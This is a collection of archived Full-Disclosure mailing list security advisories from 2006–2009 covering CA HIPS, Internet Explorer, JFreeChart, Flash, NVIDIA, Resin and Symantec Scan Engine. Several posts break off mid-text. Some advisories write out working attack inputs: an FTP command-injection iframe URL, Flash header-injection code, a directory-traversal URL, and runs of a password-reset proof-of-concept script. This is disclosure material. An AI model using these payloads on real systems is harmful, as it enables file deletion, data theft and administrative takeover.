[Full-disclosure] [IVIZ-09-005] CA HIPS Remote Kernel Vulnerability
---
[ iViZ Security Advisory 09-00519/08/2009 ]
---
iViZ Techno Solutions Pvt. Ltd.
http://www.ivizsecurity.com
--
* Title: CA HIPS kmxids.sys Remote Kernel Vulnerability
* Software: CA HIPS r8.1
--[ Synopsis:
CA HIPS is a Host Based Intrusion Prevention System in which managed
agents
are deployed on individual hosts to be protected by the HIPS and
controlled
by the centralized console.
It is possible to trigger faults in the kernel driver (kmxids.sys)
used by
the protection agent by sending certain malformed IP packets.
--[ Affected Software:
* CA HIPS r8.1 (possibly older versions too)
Tested on:
* Agent Product Version: 1.5.290
* Agent Engine Version: 1.5.286
--[ Technical description:
When CA HIPS agent processes certain malformed IP packets, it fails
to handle
certain boundary condition during parsing and pattern matching of the
packet.
It is possible to force the kernel driver (kmxids.sys) responsible for
analyzing each in/out packet to reference invalid/unmapped memory.
The following information is obtained during crash analysis:
--
CURRENT_IRQL: 2
FAULTING_IP:
kmxids+a2f4
f6b8c2f4 8a26mov ah,byte ptr [esi]
DEFAULT_BUCKET_ID: DRIVER_FAULT
BUGCHECK_STR: 0xD1
TRAP_FRAME: f88ca4f4 -- (.trap 0xf88ca4f4)
ErrCode =
eax=f88ca754 ebx=81f7415a ecx=0003 edx=428c200c esi=6e96d603
edi=f6b83264
eip=f6b8c2f4 esp=f88ca568 ebp=f88ca574 iopl=0 nv up ei pl nz
na pe nc
cs=0008 ss=0010 ds=0023 es=0023 fs=0030 gs=
efl=00010206
kmxids+0xa2f4:
f6b8c2f4 8a26mov ah,byte ptr [esi]
ds:0023:6e96d603=??
Resetting default scope
LAST_CONTROL_TRANSFER: from 804f7b9d to 80527bdc
STACK_TEXT:
f88ca0a8 804f7b9d 0003 f88ca404
nt!RtlpBreakWithStatusInstruction
f88ca0f4 804f878a 0003 6e96d603 f6b8c2f4
nt!KiBugCheckDebugBreak+0x19
f88ca4d4 80540683 000a 6e96d603 0002 nt!KeBugCheck2+0x574
f88ca4d4 f6b8c2f4 000a 6e96d603 0002 nt!KiTrap0E+0x233
WARNING: Stack unwind information not available. Following frames may be
wrong.
f88ca574 f6b832e1 6e96d603 f6b83264 0003 kmxids+0xa2f4
kmxids+0x12e1
--
The issue can be used to create a Denial of Service condition on each
of the
host protected by affected versions of CA HIPS agent, however due to the
nature of the vulnerability remote code execution is unlikely.
--[ Impact:
* Denial of Service
* Remote Code Execution is unlikely
--[ Vendor response:
* Fixed in CA Host-Based Intrusion Prevention System 8.1 CF 1
https://support.ca.com/irj/portal/anonymous/phpsupcontent?contentID=214665
--[ CVE ID:
CVE-2009-2740
--[ Credits:
This vulnerability was discovered by iViZ Security Research Team
http://www.ivizsecurity.com
http://www.ivizsecurity.com/security-advisory-iviz-sr-09005.html
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Rapid7 Advisory R7-0032: Microsoft Internet Explorer FTP Command Injection Vulnerability
___ Rapid7 Security Advisory Visit http://www.rapid7.com/ to download NeXpose, SC Magazine Winner of Best Vulnerability Management product. ___ Rapid7 Advisory R7-0032 Microsoft Internet Explorer FTP Command Injection Vulnerability Discovered: June 16th, 2007 Published: March 10, 2008 Revision: 1.0 http://www.rapid7.com/advisories/R7-0032 1. Affected system(s): KNOWN VULNERABLE: o Internet Explorer 6 (all versions) o Internet Explorer 5 (all versions) NOT VULNERABLE: o Internet Explorer 7 2. Summary Internet Explorer 5 and 6 are vulnerable to a File Transfer Protocol (FTP) CSRF-like command injection attack, whereby an attacker could execute arbitrary commands on an unsuspecting user's authenticated or unauthenticated FTP session. An attacker could delete, rename, move, and possibly steal data and upload malicious files to an FTP server under the attacker's control, on behalf of the user. 3. Vendor status and information Microsoft Corporation http://www.microsoft.com/ Microsoft was notified of this vulnerability on January 22, 2008. They acknowledged the vulnerability on February 7, 2008 and were given 30 days to provide fix information. 4. Solution The vendor plans to release a patch for this issue in an upcoming security bulletin. If possible, upgrade to Internet Explorer 7. 5. Detailed analysis The error occurs when a user visits a page containing a malicious FTP URL. Internet Explorer 5 and 6 decode and do not properly sanitize the supplied URL. It is possible to force Internet Explorer to chain FTP commands together by inserting URL encoded CRLF pairs after each command in the URL supplied by an HTML element. iframe src=ftp://[EMAIL PROTECTED]:port/%0D%0ADELE%20foo.txt%0D%0A/ Moreover, if two forward slashes are appended to the end of the malicious URL, Internet Explorer will attempt to use an already pre-authenticated connection established earlier by the user in the same browser session. If the user has a pre-authenticated connection to an FTP server, an attacker, knowing the username and endpoint of that pre-authenticated connection, could piggyback on the user's session to execute arbitrary commands. A pre-authenticated connection is not necessary to carry out this attack, as Internet Explorer will attempt an anonymous login if no username is specified in the URL. If only the username is specified and no trailing forward slashes are appended to the string, Internet Explorer will send the username with a blank password (which may be sufficient for more obscure anonymous user accounts). If no username is specified, Internet Explorer will attempt to login using the 'IEUser@' user. Successful execution of some attacks may depend on the command tokenizing strategy used by the target FTP server and the security configuration on the FTP server (for instance, most FTP servers do not allow PORT requests for endpoints which do not have the same address as the requesting client). In testing, Internet Explorer 6 SP2 required the two trailing forward slashes for the exploit to work correctly. Internet Explorer 6 SP1 did not have this restriction. Internet Explorer 7 is not vulnerable to this issue, as it correctly sanitizes the URL before attempting to make the request on the FTP server. Demonstration of the exploit piggybacking on a pre-authenticated connection (malicious URL with two trailing forward slashes) with IE6 SP2: Malicious URI: ftp://[EMAIL PROTECTED]/%0D%0ADELE%20foo.txt%0D%0ACWD// -- Welcome banner 220 debian FTP server (Version wu-2.6.2(2) Tue Mar 20 18:26:53 PST 2007) ready. -- IE6 Requests a user USER admin -- FTP server requires password 331 Password required for admin. -- IE6 supplies password. PASS admin -- FTP Server responds with successful login. 230 User admin logged in. -- IE6 tests 'OPTS UTF8' option. opts utf8 on -- Server responds with negative permanent reply to OPTS request. 500 'OPTS utf8 on': command not understood. -- IE6 asks for the present working directory. PWD -- Server sends positive completion reply for PWD. 257 /home/admin is current directory. -- IE6 requests malicious FTP URI from an iframe in HTML doc CWD /home/admin/ DELE foo.txt CWD/ -- Server responds with positive completion for CWD 250 CWD command successful. -- IE6 sends a 'TYPE A' request TYPE A -- Server responds with positive completion for DELE 250 DELE command successful. -- IE6 sends a NOOP. noop -- Server sends negative permanent response for last (invalid) command. 500 'CWD
[Full-disclosure] R7-0031: JFreeChart Image Map Cross-Site Scripting Vulnerabilities
___ Rapid7 Security Advisory Visit http://www.rapid7.com/ to download NeXpose, SC Magazine Winner of Best Vulnerability Management product. ___ Rapid7 Advisory R7-0031 JFreeChart Image Map Cross-Site Scripting Vulnerabilities Published: Dec 06, 2007 Revision: 1.0 http://www.rapid7.com/advisories/R7-0031.jsp 1. Affected system(s): KNOWN VULNERABLE: o JFreeChart 1.0.8 KNOWN FIXED: o JFreeChart 1.0.8 branch jfreechart-1.0.8-security 2. Summary JFreeChart is a popular Java-based chart library used to generate charts and graphs of data. The library includes support for generating HTML image maps, which allow for enhanced interaction of the chart via hyperlinks bound to shapes specified by coordinates. Multiple cross-site scripting vulnerabilities exist within the image map support functionality of JFreeChart which may allow an attacker to inject arbitrary HTML or JavaScript into any product or website which uses the library. 3. Vendor status and information JFreeChart Project http://sourceforge.net/projects/jfreechart/ The JFreeChart project was notified of this vulnerability on November 28th, 2007 via their online bug tracking system. The vulnerability was fixed on December 6th 2007 with a commit to their SVN repository. 4. Solution Upgrade to JFreeChart SVN repository revision 682 using branch jfreechart-1.0.8-security. See http://jfreechart.svn.sourceforge.net/viewvc/jfreechart/ for details. 5. Detailed analysis JFreeChart fails to properly escape the following properties of the generated image map: o The chart name. o The chart tool tip text. o The href attribute for a chart area. o The shape attribute for a chart area. o The coords attribute for a chart area. It is possible to inject custom HTML code into the code generated by the JFreeChart library. If a web server uses this library to generate charts from user-supplied data, an attacker could cause other users of the same website or application to execute arbitrary JavaScript code when viewing a page containing a chart. 6. Credit Discovered by Chad Loder of Rapid7. 7. Contact Information Rapid7, LLC Email: [EMAIL PROTECTED] Web: http://www.rapid7.com Phone: +1 (617) 247-1717 8. Disclaimer and Copyright Rapid7, LLC is not responsible for the misuse of the information provided in our security advisories. These advisories are a service to the professional security community. There are NO WARRANTIES with regard to this information. Any application or distribution of this information constitutes acceptance AS IS, at the user's own risk. This information is subject to change without notice. This advisory Copyright (C) 2007 Rapid7, LLC. Permission is hereby granted to redistribute this advisory, providing that no changes are made and that the copyright notices and disclaimers remain intact. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] (no subject)
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Foresight Linux Essential Advisory: 2007-0024-1 Published: 2007-06-04 Rating: Moderate Updated Versions: libexif=/[EMAIL PROTECTED]:devel//[EMAIL PROTECTED]:1-devel//1/0.6.15-0.1-1 group-dist=/[EMAIL PROTECTED]:1-devel//1/1.3-0.1-6 References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-2645 https://issues.rpath.com/browse/RPL-1431 Description: Previous versions of the libexif package were vulnerable to an int overflow when loading EXIF data which could cause a crash (denial of service) or potentially allow the attacker to execute arbitrary code at the permission level of the user running a program which uses libexif. - --- Copyright 2007 Foresight Linux Project This file is distributed under the terms of the MIT License. A copy is available at http://www.foresightlinux.org/permanent/mit-license.html -BEGIN PGP SIGNATURE- Version: GnuPG v2.0.4 (GNU/Linux) iQIVAwUBRmRyJdfwEn07iAtZAQKE5w//f+RbLrHDhNXq Ijz1LwPvNFpr3BfseRnU DOZ4IZgLC5Bg7tOSVZtwRZRqDtPJqizNupQH5MZGWitW2PRZTf2j6pdCaLC5uJ93 OhALBccXxvU+TCgC19ocEDci1dCTk6oHJ0LjmSROsaWawnpTEdax0iLyYKA5NLaX f4eocNnsmBYJ3psCDyC14bkmE2vyose2pAA0Itd4iw7S7psZBnn4oyN3iIXTzA8M KQ9ZgY/YJ7qTUvakGVMbl0vninacuXGnPGSN05OTgP9X7yql5e/jaObaf1uEmgn2 kx0WayL+9CBTU1pT3H0TbD0rXpNHNQEctcSNzOJpWBWFFuFJi4hnByTD97jy4a4P t0b271cjO5S+6h624od24kNxb4BggyHAn8t9U7ocGGuurD3ePUmJsTolbW4cZ/GZ w6VVrAsLQg3zdLu49IZJi97WwvWFdjltOGKOU4xE47Wo/MgISo5vElb8GAAOVs6t U0uoVoB75HNRbhrnVDNd1wM2qqCTQaWuvz3S04frz06dPGNCyEAABezrS9ij1D5m KB4QZoNn1gn8B1wuvmTsV+7apUeiDXUDWHWe5XdAHnNwl0xYIX00oz3iT6xbenT2 ZK/ng88N1k639rs5iuJiYSBJL+8nD9FH6+cnUVeu63vlgvSGuuy3p+b67IhYVuf1 DCrJFbnLjVU= =6scq -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] CyTRAP Labs - Urs+Nahum's Security Checklist
Dear Colleague, The latest version will always be here: - Urs+Nahum's Security Checklist pdf 350 KB for download - http://regustand.cytrap.eu/?p=1 (PS. it is complementary and free for everybody, of course) Urs+Nahum's Security Checklist was released May 30, 2007 but an UPDATED version was released today May 31, 2007 and is available for download at the above link. Cordially Urs E. Gattiker CyTRAP Labs Roentgenstrasse 49 8005 Zurich Switzerland +41 (0)44 272 - 1876 +41 (0)76 200 - 7778 (mobile) email: Urs+Nahum-Checklist at CyTRAP.eu XX At 13:00 2007-05-30, you wrote: Message: 8 Date: Tue, 29 May 2007 14:53:17 -0700 From: blah [EMAIL PROTECTED] Subject: Re: [Full-disclosure] CyTRAP Labs - Urs+Nahum's Security Checklist To: CyTRAP Labs - advisory [EMAIL PROTECTED] Cc: full-disclosure@lists.grok.org.uk Message-ID: [EMAIL PROTECTED] Content-Type: text/plain; charset=iso-8859-1 I tried the link you listed, but it didn't work (no surprise there since it's not released), but it looks like the document's available at: http://www.cytrap.eu/files/ReguStand/2007/pdf/Urs%2BNahumChecklist-2007-05-29.pdf so i guess it is released. who wants to wait til tomorrow? ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] CyTRAP Labs - Urs+Nahum's Security Checklist
Dear Colleagues, I thought this might be of interestregulators have done their best to improve legislation to help organizations to better protect their information systems. Unfortunately and as a result of this, organizations have been buried in an avalanche of conflicting requirements that are difficult to keep track off. They are expected to demonstrate an acceptable standard of due care in managing their computing infrastructures and the information that networks and systems create, transmit, and store. Moreover, they have to show that all this helps reduce the risk against having their systems misused for criminal activities. Hence, we thought we write Urs+Nahum's Security Checklist. It provides well structured information that enables high-level reporting, thus empowering executive and technical leaders with a greater ability to make informed decisions. It prioritizes numerous requirements that managers need, guiding them through the process that improves corporate risk management and information security while helping improve confidentiality of data and citizens' privacy. You can get a short summary here: - short summary about Urs+Nahum's Security Checklist - press release -- http://info.cytrap.eu/?page_id=64 - an advanced copy of Urs+Nahum's Security Checklist pdf 350 KB for download - http://regustand.cytrap.eu/?p=1 (PS. it is complementary and free for everybody, of course) Urs+Nahum's Security Checklist will be released May 30, 2007. We hope that it will be useful to you all in your daily work. Please let us know what you think about this work, if you can spare the time, of course. Enjoy your long weekend. Cordially Urs E. Gattiker CyTRAP Labs Roentgenstrasse 49 8005 Zurich Switzerland +41 (0)44 272 - 1876 +41 (0)76 200 - 7778 (mobile) email: Urs+Nahum-Checklist at CyTRAP.eu ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Tele2 - Versatel and Vivendi - exploit PATCHED
This vulnerability has been patched successfully by the vendor as tests by various parties have demonstrated, more details here: http://cytrap.eu/blog/?p=133 Happy Holidays Urs E. Gattiker CyTRAP Labs and www.CASEScontact.org At 21:23 2006-10-04, you wrote: -- Message: 2 Date: Wed, 04 Oct 2006 13:56:27 +0200 Subject: [Full-disclosure] Tele2 - Versatel and Vivendi - exploit To: full-disclosure@lists.grok.org.uk Message-ID: [EMAIL PROTECTED] Content-Type: text/plain; charset=us-ascii; format=flowed Tele 2 has recently announced that it is selling its Benelux assets to Versatel and yesterday it informed the media that it intends to do the same with its French assets, selling those to Vivendi. The company that touts itself as providing economical broadband and telecommunication services does, however, have a slight problem regarding information security. A vulenrability is being taken advantage off by various groups of people and, in turn, this could harm home users that receive their broadband and fixed-line services from Tele2. In fact, several security features can be de-activated allowing a malicious user to take control of a user's PC, his broadband connection as well as his phone line as described here with a screen shot: http://cytrap.eu/blog/?p=57 This is another example where user's face risks regarding their internet connection they might not even be aware of. Another one of those is the recent Fon example also circulated on this list. Urs E. Gattiker CyTRAP Labs CASEScontact.org ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Rapid7 Advisory R7-0026: HTTP Header Injection Vulnerabilities in the Flash Player Plugin
Rapid7 Advisory R7-0026
HTTP Header Injection Vulnerabilities in the Flash Player Plugin
Published: Oct 17, 2006
Revision:1.0
http://www.rapid7.com/advisories/R7-0026.jsp
1. Affected System(s):
KNOWN VULNERABLE:
o Flash Player plugin 9.0.16 (for Windows)
o Flash Player plugin 7.0.63 (for Linux)
PROBABLY VULNERABLE:
o Earlier 9.0.x and 7.0.x versions
o 8.0.x versions
KNOWN FIXED:
o Flash Player plugin BETA version 9.0.18d60 (for Windows)
2. Summary
Two HTTP Header Injection vulnerabilities have been discovered by Rapid7
in the Flash Player plugin. They allow attackers to perform arbitrary
HTTP requests while controlling most of the HTTP headers. This can make
it easier to perform CSRF attacks [2] in some cases. When the HTTP
server implements Keep-Alive connections and when Firefox is used, these
Flash vulnerabilities can even be used to perform totally arbitrary HTTP
requests where every part is controlled by the attacker: HTTP method,
URI, HTTP version, headers, and data. Such attacks make use of the HTTP
Request Splitting method.
3. Vendor Status and Information
Adobe Systems, Inc.
http://www.adobe.com
Sep 18, 2006
Adobe acknowledges reception of the vulnerability details.
Sep 29, 2006
Adobe responds with proposed dates for a fix later this year.
Oct 5, 2006
Adobe releases a fixed BETA version of Flash 9 for Windows (version
9.0.18d60, release files are named beta_100406).
Oct 17, 2006
Advisory is published after expiration of the 30-day grace period
granted to Adobe to fix and disclose the vulnerabilities.
4. Solution
Used the fixed BETA version (9.0.18d60). Only allow trusted websites to
use Flash. Disable or uninstall the Flash plugin. Use alternative Flash
plugins (GplFlash, Gnash).
5. Detailed Analysis
The vulnerabilities described hereafter have been successfully tested
with the latest versions of Flash available for various platforms as of
2006/09/06, and with multiple combinations of browser/OS:
o IE6 SP2 (aka IE6 SV1) for Windows, with Flash plugin 9.0.16
o Firefox 1.5.0.6 for Windows, with Flash plugin 9.0.16
o Firefox 1.5.0.6 for Linux, with Flash plugin 7.0.63
5.1. XML.addRequestHeader() Vulnerability
Flash features a scripting language called ActionScript. ActionScript
comes with a certain number of standard classes available to Flash
developers. In particular, the send() method of the XML object can be
used to send XML document trees to arbitrary URLs using, by default, a
POST request. This, in itself, is not a vulnerability; the XML.send()
method definitely complies with the Flash security model [4].
However another method defined in the XML class, addRequestHeader(), can
be used to add arbitrary HTTP headers to the request performed by Flash.
Its intended usage is:
var req:XML=new XML('test');
req.addRequestHeader(X-My-Header, 42);
req.send(http://host/path;);
When calling req.send(http://host/path;), such a POST request would be
submitted to 'host' (common HTTP headers that do not matter to us in
this example have been removed for brevity):
POST /path HTTP/1.1
Host: host
Referer: (referer)
Content-type: application/x-www-form-urlencoded
X-My-Header: 42
Content-Length: 4
test
For security reasons, Flash 9 does not let developers use
addRequestHeader() to set headers such as Host, Referer, or
Content-Length.
But there is a way to get around this security restriction: the
addRequestHeader() method does not sufficiently sanity check its two
arguments. This makes it possible to inject arbitrary headers:
req.addRequestHeader(Referer:http://anywhere\r\nX-foo;, bar);
With IE, a request containing only the fake Referer is sent:
POST /path HTTP/1.1
Host: host
Referer: http://anywhere
Content-Type: application/x-www-form-urlencoded
X-foo: bar
Content-Length: 4
test
With Firefox, a request containing both the real Referer and the fake
one is sent:
POST /path HTTP/1.1
Host: host
Referer: (real referer)
Content-type: application/x-www-form-urlencoded
Referer:http://anywhere
X-foo: bar
Content-Length: 4
test
For this attack to work, the first argument of addRequestHeader() must
not contain any space (ASCII 0x20) else the Flash plugin appears to
ignore the addRequestHeader() call. This is absolutely not a problem in
real-world attack scenarios, because the space character usually present
before the Referer value is optional (see RFC 2616 [5], section 4.2
Message Headers).
It is interesting to note that IE seems to post-process the headers
generated by Flash before sending them to the HTTP server. Indeed, IE
diligently removes the real Referer to use the Flash-generated one, and
it even automatically adds the optional space character before the fake
Referer value.
Of course any cookie that would be associated with 'host' would be
automatically sent along with the request, which is another good thing
for attackers.
For total control of the generated request, when the server supports
[Full-disclosure] Rapid7 Advisory R7-0025: Buffer Overflow in NVIDIA Binary Graphics Driver For Linux
___ Rapid7, LLC Security Advisory Visit http://www.rapid7.com/ to download NeXpose, SC Magazine Winner of Best Vulnerability Management product. ___ Rapid7 Advisory R7-0025 Buffer Overflow in NVIDIA Binary Graphics Driver For Linux Published: Oct 16, 2006 Revision: 1.0 http://www.rapid7.com/advisories/R7-0025.jsp 1. Affected system(s): KNOWN VULNERABLE: o NVIDIA Driver For Linux v8774 o NVIDIA Driver For Linux v8762 PROBABLY VULNERABLE: o NVIDIA Driver for FreeBSD o NVIDIA Driver for Solaris o Earlier versions KNOWN FIXED: o None 2. Summary The NVIDIA Binary Graphics Driver for Linux is vulnerable to a buffer overflow that allows an attacker to run arbitrary code as root. This bug can be exploited both locally or remotely (via a remote X client or an X client which visits a malicious web page). A working proof-of-concept root exploit is included with this advisory. The NVIDIA drivers for Solaris and FreeBSD are also likely to be vulnerable. 3. Vendor status and information NVIDIA Corporation http://www.nvidia.com There have been multiple public reports of this NVIDIA bug on the NVNews forum [1,2] and elsewhere, dating back to 2004 [3]. NVIDIA's first public acknowledgement of this bug was on July 7th, 2006. In a public posting [1] on the NVNews forum, an NVIDIA employee reported having reproduced the problem, assigned it bug ID 239065, and promised a fix would be forthcoming. As of the publication date, the latest NVIDIA binary driver is still vulnerable. Furthermore, it is our opinion that NVIDIA's binary driver remains an unacceptable security risk based on the large numbers of reproducible, unfixed crashes that have been reported in public forums and bug databases. This number does not include bugs reported directly to NVIDIA. 1. http://www.nvnews.net/vbulletin/showthread.php?p=931048 (Jul 2006) 2. http://www.nvnews.net/vbulletin/showthread.php?t=76493(Sep 2006) 3. https://bugs.freedesktop.org/show_bug.cgi?id=2129 (Dec 2004) 4. http://lists.freedesktop.org/archives/xorg/2005-January/005642.html 5. http://forums.gentoo.org/viewtopic.php?t=282107 (Jan 2005) 6. https://bugs.eclipse.org/bugs/show_bug.cgi?id=87299 (Mar 2005) 7. http://www.nvnews.net/vbulletin/showthread.php?t=76206(Sep 2006) 4. Solution Disable the binary blob driver and use the open-source nv driver that is included by default with X. 5. Detailed analysis There are two NVIDIA graphics drivers for Linux: a closed-source binary blob driver provided by NVIDIA (which provides acceleration) and an open-source driver (which lacks acceleration). NVIDIA's binary blob driver contains an error in its accelerated rendering of glyphs (text character data) that can be exploited to write arbitrary data to anywhere in memory. The open-source driver is not vulnerable. The XRender extension provides a client function named XRenderCompositeString8 which tells the X server to render glyphs onto the screen. This request is processed by the server's ProcRenderCompositeGlpyhs function. This function pulls the glyphs out of the render request, constructs a glyph list, and then calls into the graphics driver via a registered callback function. The NVIDIA binary blob driver registers a function named _nv000373X. This function calculates a bounding BoxRec of the total area occupied by the glyph data. It then uses Xalloc to allocate a buffer large enough to hold the data by multiplying width * height. This buffer is then passed to another internal function called _nv53X. The _nv53X function iterates over the glyph list and copies glyph data into the buffer using each glyph's accumulated width, xOff, height, and yOff values to calculate the destination position in the buffer. The NVIDIA binary blob driver does not check this calculation against the size of the allocated buffer. As a result, a short sequence of user-supplied glyphs can be used to trick the function into writing to an arbitrary location in memory. It is important to note that glyph data is supplied to the X server by the X client. Any remote X client can gain root privileges on the X server using the proof of concept program attached. It is also trivial to exploit this vulnerability as a DoS by causing an existing X client program (such as Firefox) to render a long text string. It may be possible to use Flash movies, Java applets, or embedded web fonts to supply the custom glyph data necessary for reliable remote code execution. A simple HTML page containing an INPUT field with a long value is sufficient to demonstrate
[Full-disclosure] Caucho Resin Windows Directory Traversal Vulnerability
___ Rapid7 Security Advisory Visit http://www.rapid7.com/ to download NeXpose, SC Magazine Winner of Best Vulnerability Management product. ___ Rapid7 Advisory R7-0024 Caucho Resin Windows Directory Traversal Vulnerability Published: May 16, 2006 Revision: 1.0 http://www.rapid7.com/advisories/R7-0024.html CVE:CVE-2006-1953 1. Affected system(s): KNOWN VULNERABLE: o Caucho Resin v3.0.18 for Windows o Caucho Resin v3.0.17 for Windows NOT VULNERABLE: o Caucho Resin v3.0.19 o Caucho Resin v3.0.16 and earlier 2. Summary The Caucho Resin web application server for Windows contains a directory traversal vulnerability that allows remote unauthenticated users to download any file from the system. It is possible to download files from any drive on the system. Rapid7 have updated NeXpose to check for this vulnerability. Licensed customers will receive the new vulnerability checks automatically. Visit http://www.rapid7.com to register for a free demo of NeXpose. 3. Vendor status and information Caucho Technology, Inc. http://www.caucho.com/ Caucho was notified of this vulnerability on April 20th, 2006. They fixed this vulnerability in the latest unofficial snapshot of Resin 3.0.19, available from Caucho's website. 4. Solution Upgrade to the latest snapshot version of Resin, version 3.0.19. 5. Detailed analysis Caucho Resin is a servlet and JSP server. Resin ships with its own standalone web server which runs by default on port 8080. Any remote user can request URLs of the form: http://victim:8080/C:%5C/ to access the root of the C: drive (and any files below it). Any drive letter can be specified. Only Resin on Windows is vulnerable. This vulnerability appears to have been introduced in Resin version 3.0.17, although this has not been confirmed by the vendor. 6. Contact Information Rapid7 Security Advisories Email: [EMAIL PROTECTED] Web:http://www.rapid7.com/ Phone: +1 (617) 603-0700 7. Disclaimer and Copyright Rapid7, LLC is not responsible for the misuse of the information provided in our security advisories. These advisories are a service to the professional security community. There are NO WARRANTIES with regard to this information. Any application or distribution of this information constitutes acceptance AS IS, at the user's own risk. This information is subject to change without notice. This advisory Copyright (C) 2006 Rapid7, LLC. Permission is hereby granted to redistribute this advisory, providing that no changes are made and that the copyright notices and disclaimers remain intact. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Rapid7 Advisory R7-0021: Symantec Scan Engine Authentication Fundamental Design Error
___ Rapid7, LLC Security Advisory ___ Rapid7 Advisory R7-0021 Symantec Scan Engine Authentication Fundamental Design Error Published: April 21, 2006 Revision: 1.0 http://www.rapid7.com/advisories/R7-0021.html CVE: CVE-2006-0230 1. Affected system(s): KNOWN VULNERABLE: o Symantec Scan Engine v5.0.0.24 KNOWN FIXED: o Symantec Scan Engine v5.1.0.7 UNKNOWN (PROBABLY VULNERABLE): o All v5.0.x.x o Earlier versions 2. Summary Symantec Scan Engine provides a web-based administrative interface that is used for managing scanning options and antivirus definitions. To access the interface, an administrator must browse to it, load a Java applet, and log in with a password. However, the authentication mechanism used by Symantec Scan Engine contains a fundamental design flaw that allows any remote user to gain full administrative access to the server. The server does not verify the password entered by the user. The password is only verified by the client-side Java applet. Anyone with knowledge of the underlying communication mechanism can exercise full control of the Scan Engine server simply by posting XML requests to the server using its proprietary protocol. NeXpose, Rapid7's award-winning vulnerability assessment platform, checks for this vulnerability and other vulnerabilities we have discovered in Symantec Scan Engine. Visit http://www.rapid7.com to register for a free demo of NeXpose. 3. Vendor status and information Symantec Corporation http://www.symantec.com Symantec was notified of this vulnerability on January 17, 2006. They acknowledged the vulnerability, then provided us with a fixed version. Rapid7's advisory was publicly released on April 21, 2006. 4. Solution Upgrade to Symantec Scan Engine v5.1.0.7 or later. 5. Detailed analysis The administrative web interface, which is typically accessible on default TCP port 8004, is implemented as a Java applet. Also, an additional SSL connection to TCP port 8005 is used by the applet to exchange configuration information with the server using a proprietary protocol based on XML exchanges. The authentication model used by the administrative interface is utterly flawed, because the server trusts the client applet to correctly authenticate users. The protocols themselves (HTTP on port 8004 and proprietary protocol on port 8005) do NOT require client authentication. For example, when an administrator user changes his password via the administrative interface, the Java applet simply connects to port 8005 and sends a request to change the administrator password hash. No authentication is required. The direct consequence of this is that any remote attacker can change the administrator password to a password of his choice. We have included with this advisory a proof-of-concept Perl script which demonstrates this vulnerability (see change_scan_engine_pw.pl). Here is an example scenario: $ ./change_scan_engine_pw.pl --pwd foobar 10.68.4.4 Old hash: E97B788686921D991B3179F1E8CCA6491D3714F2F3EC2ADE399CB71A828090AF New hash: 656268BDDE60892B3B5D92781E79C05031E2B48F3D222EB8A71D507FAB2E9EB0 Password successfully set to: 'foobar' $ ./change_scan_engine_pw.pl \ --hash E97B788686921D991B3179F1E8CCA6491D3714F2F3EC2ADE399CB71A828090AF \ 10.68.4.4 Old hash: 656268BDDE60892B3B5D92781E79C05031E2B48F3D222EB8A71D507FAB2E9EB0 New hash: E97B788686921D991B3179F1E8CCA6491D3714F2F3EC2ADE399CB71A828090AF The first command resets the administrator password to 'foobar': it asks Scan Engine for the current administrator password hash (E97B...) for information purpose only (the attack does not actually require knowledge of the previous password hash), computes the hash corresponding to the new password (6562...), and uploads this new hash. The second command just restores the previous password (which is unknown) by re-uploading the previous hash (E97B...) to the server. Note: the 256-bit password hash is computed using the following algorithm. First, a random 128-bit salt is chosen. Second, a character string is built by concatenating the password string and the uppercase hexadecimal representation of the salt. Third, the 128-bit MD5 digest of this concatenated string is computed. Finally the 256-bit password hash is built by concatenating the 128-bit MD5 digest and the 128-bit salt. 6. Credit This vulnerability was discovered by Marc Bevand of Rapid7. 7. Contact Information Rapid7, LLC Email: [EMAIL PROTECTED] Web: http://www.rapid7.com Phone: +1 (617) 247-1717 8. Disclaimer and Copyright Rapid7, LLC is not responsible for the misuse of the information
[Full-disclosure] Rapid7 Advisory R7-0022: Symantec Scan Engine Known Immutable DSA Private Key
___ Rapid7, LLC Security Advisory ___ Rapid7 Advisory R7-0022 Symantec Scan Engine Known Immutable DSA Private Key Published: April 21, 2006 Revision: 1.0 http://www.rapid7.com/advisories/R7-0022.html CVE: CVE-2006-0231 1. Affected system(s): KNOWN VULNERABLE: o Symantec Scan Engine v5.0.0.24 KNOWN FIXED: o Symantec Scan Engine v5.1.0.7 UNKNOWN (PROBABLY VULNERABLE): o All v5.0.x.x o Earlier versions 2. Summary Symantec Scan Engine exhibits a vulnerability in the way it generates the SSL private key used for protecting communications over TCP port 8005. This port is used to exchange sensitive configuration and control commands between the server and the administrative control application. While all data over this port is protected using SSL, Rapid7 has found that every installation of Symantec Scan Engine uses the same private DSA key. This immutable key cannot be changed by end users and can be extracted easily from any installation of this product. This design flaw renders the SSL protection useless. A man-in-the-middle attacker could easily intercept and decrypt all communications between Symantec Scan Engine and an administrative client. NeXpose, Rapid7's award-winning vulnerability assessment platform, checks for this vulnerability and other vulnerabilities we have discovered in Symantec Scan Engine. Visit http://www.rapid7.com to register for a free demo of NeXpose. 3. Vendor status and information Symantec Corporation http://www.symantec.com Symantec was notified of this vulnerability on January 17, 2006. They acknowledged the vulnerability, then provided us with a fixed version. Rapid7's advisory was publicly released on April 21, 2006. 4. Solution Upgrade to Symantec Scan Engine v5.1.0.7 or later. 5. Detailed analysis Symantec Scan Engine's administrative client exchanges sensitive configuration information with the server using a proprietary protocol protected by SSL which runs by default on TCP port 8005. This built-in SSL server is used, for example, to transmit the administrator password hash when changing the password. It is crucial for this communication channel to remain private, authenticated, and reliable. A critical design error has been made in the way SSL protection is employed. The use of a particular 